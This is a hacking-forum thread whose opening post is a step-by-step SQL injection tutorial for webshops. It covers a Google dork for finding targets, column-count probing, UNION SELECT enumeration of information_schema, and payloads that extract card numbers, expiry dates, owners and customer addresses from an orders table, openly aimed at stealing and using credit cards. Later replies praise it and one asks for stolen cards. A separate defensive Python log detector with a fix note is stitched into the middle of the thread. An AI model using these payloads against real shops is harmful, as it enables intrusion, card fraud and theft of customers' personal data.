Webshop Hacking

Discussion in 'Hacking Tutorials' started by Administrator, May 3, 2017.

  1. Administrator

    Administrator Administrator

    Joined:
    May 1, 2017
    Messages:
    65
    Webshop Hacking
    1) We have to search Google for webshops. I used this dork:
    CODE:
    inurl:customer_testimonials.php testimonial_id=
    2) Let's say we got this site:
    CODE:
    http://www.JustExample.com/customer_...stimonial_id=7
    3) We have to check if it's vulnerable to SQLi. We add this
    CODE:
    '
    to the URL:

    >>>
    CODE:
    http://www.JustExample.com/customer_...stimonial_id=7'
    If we get an error, it means the website is vulnerable.

    4) We have to check the number of columns. We try with 10 first:
    CODE:
    +order+by+10-


    - :


    >>>
    CODE:
    http://www.JustExample.com/customer_...+order+by+10--






    If we don't get an error, it means the website has more than 10 columns. If we get an error, it means the website has fewer than 10 columns.

    5) This time we get an error. Now we try from 1 to 9:
    CODE:
    +union+select+1,2,3,4,5,6,7,8,9--




    >>>
    CODE:
    http://www.JustExample.com/customer_...,4,5,6,7,8,9--




    Now we found it: the website has 9 columns.

    6) Most of the time we can get info from table 3 and 6. Let's say now we can from 3 xD. Now we can get the database user, database name and database version in this way:

    *- database user
    CODE:
    http://www.JustExample.com/customer_...,4,5,6,7,8,9--


    *- database name


    CODE:
    http://www.JustExample.com/customer_...,4,5,6,7,8,9--


    *- database version


    CODE:
    http://www.JustExample.com/customer_...,4,5,6,7,8,9--


    7) We need the table names. We add this to the URL:
    CODE:
    +union+select+1,2,table_name,4,5,6,7,8,9+from+info rmation_schema.tables--






    CODE:
    http://www.JustExample.com/customer_...chema.tables--




    8) Now we need the columns. We add this to the URL:
    CODE:
    +union+select+1,2,concat(table_name,char(58),colum n_name),4,5,6,7,8,9+from+information_schema.column s--


    >>>
    CODE:
    http://www.JustExample.com/customer_...hema.columns--
    9) Now all we have to do is view the orders and customers info (there are the credit cards xD). If we add this to the URL we will get credit card numbers, payment method, credit card type ......
    CODE:
    +union+select+1,2,concat(payment_method,char(58),c c_type,char(58),cc_number,char(58),cc_expires),4,5 ,6,7,8,9fromorders--




    >>>
    CODE:
    http://www.JustExample.com/customer_...+from+orders--




    If we add this to the URL we will get a lot of info about customers: address, phone number, e-mails, zip code, and the credit card info, all of them.
    CODE:
    +union+select+1,2,concat(orders_id,0x2F,cc_type,0x 2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,cu stomers_street_address,0x2F,customers_suburb,0x2F, customers_city,0x2F,customers_postcode,0x2F,custom ers_state,0x2F,customers_country,0x2F,customers_te lephone,0x2F,customers_email_address,0x2F,date_pur chased),4,5,6,7,8,9+from+orders+




    >>>
    CODE:
    http://www.JustExample.com
    /customer_testimonials.php?&testimonial_id=7+union+ select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_o wner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers _street_address,0x2F,customers_suburb,0x2F,custome rs_city,0x2F,customers_postcode,0x2F,customers_sta te,0x2F,customers_country,0x2F,customers_telephone ,0x2F,customers_email_address,0x2F,date_purchased) ,4,5,6,7,8,9+from+orders+




    now one step left


    10 ) get the credit cards and have fun
     
    samtek and Terry132 like this.
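
Seen from the defender's side, every step in the post above puts a non-numeric `testimonial_id` value into the web server's access log, so the requests can be flagged and graded by stage. The following Python code is an added example, not part of the original post; the log lines are constructed and the `classify` and `scan` names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request lines (not from a real server), one per step in the post.
SAMPLE_LOG = [
    "GET /customer_testimonials.php?testimonial_id=7 HTTP/1.1",
    "GET /customer_testimonials.php?testimonial_id=7' HTTP/1.1",
    "GET /customer_testimonials.php?testimonial_id=7+order+by+10-- HTTP/1.1",
    "GET /customer_testimonials.php?testimonial_id=7+union+select+1,2,table_name"
    "+from+information_schema.tables-- HTTP/1.1",
    "GET /customer_testimonials.php?testimonial_id=7+union+select+1,2,cc_number"
    "+from+orders-- HTTP/1.1",
    "GET /index.php?page=2 HTTP/1.1",
]

# Stages from the post, most severe first; the first match wins.
STAGES = [
    ("card-data-read", re.compile(r"\bcc_(number|expires|owner|type)\b", re.I)),
    ("schema-enumeration", re.compile(r"information_schema", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("column-count-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
]

def classify(request_line, param="testimonial_id"):
    """Return None for a clean request, else the most severe stage name."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    # parse_qs decodes '+' and %xx, so encoded payloads are matched too.
    query = urlsplit(parts[1]).query
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        if re.fullmatch(r"[0-9]{1,10}", value):
            continue  # a legitimate id is a short run of digits
        for name, pattern in STAGES:
            if pattern.search(value):
                return name
        return "non-numeric-id"  # e.g. the single-quote probe
    return None

def scan(lines):
    """Return (line_index, stage) for every flagged request line."""
    hits = []
    for i, line in enumerate(lines):
        stage = classify(line)
        if stage:
            hits.append((i, stage))
    return hits

if __name__ == "__main__":
    for index, stage in scan(SAMPLE_LOG):
        print(index, stage)
```

Detection only surfaces the attempts; the root cause is that `testimonial_id` reaches the SQL query as text, which is removed by casting it to an integer and passing it as a bound parameter.
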
  2. Terry132

    Terry132 New Member

    Joined:
    Apr 23, 2018
    Messages:
    8
    Thanks
     
  3. Crack7

    Crack7 New Member

    Joined:
    Apr 27, 2018
    Messages:
    5
    I want to contact you! How can I contact you?
     
  4. Arayan

    Arayan New Member

    Joined:
    Aug 1, 2018
    Messages:
    2
    I want your help plzz give me high balance cc
     
  5. Iwantlif3

    Iwantlif3 New Member

    Joined:
    Aug 11, 2018
    Messages:
    4
    You are the best, thanks.
     
